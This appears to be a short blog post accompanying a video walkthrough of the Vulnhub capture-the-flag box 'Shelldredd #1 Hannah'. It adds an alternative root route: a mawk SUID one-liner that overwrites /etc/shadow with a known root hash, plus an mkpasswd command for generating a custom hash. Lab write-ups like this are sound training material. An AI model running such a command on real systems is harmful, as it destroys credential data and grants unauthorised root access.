Vulnhub SHELLDREDD #1 HANNAH Live
Let me know if you prefer this format instead of text walkthroughs. This is much easier but you’ll likely have to put up with my incoherent ramblings.
It turned out to be a very easy box. Easy step for user and what turned out to be 2 routes to root. After I stopped recording I played about with the other SUID that was found and managed to get root that way too.
The other way not in the video
Using mawk you can run the following command to overwrite the /etc/shadow/ file then su root. The password is rowbot.
mawk -v LFILE=$LFILE 'BEGIN { print "root:$6$saltsalt$zjiFtiGFBUkyU86/TTUE1Dgg6ZNem6QUdhcVVRsjLXvWGjCm90F/2.PDpGOfGCspP0/j6a6YLlImSqQZIUmqc.:18294:0:99999:7:::" > LFILE }'
To set your own password run this and edit the command above to include the output of the command
mkpasswd -m sha-512 -S saltsalt -s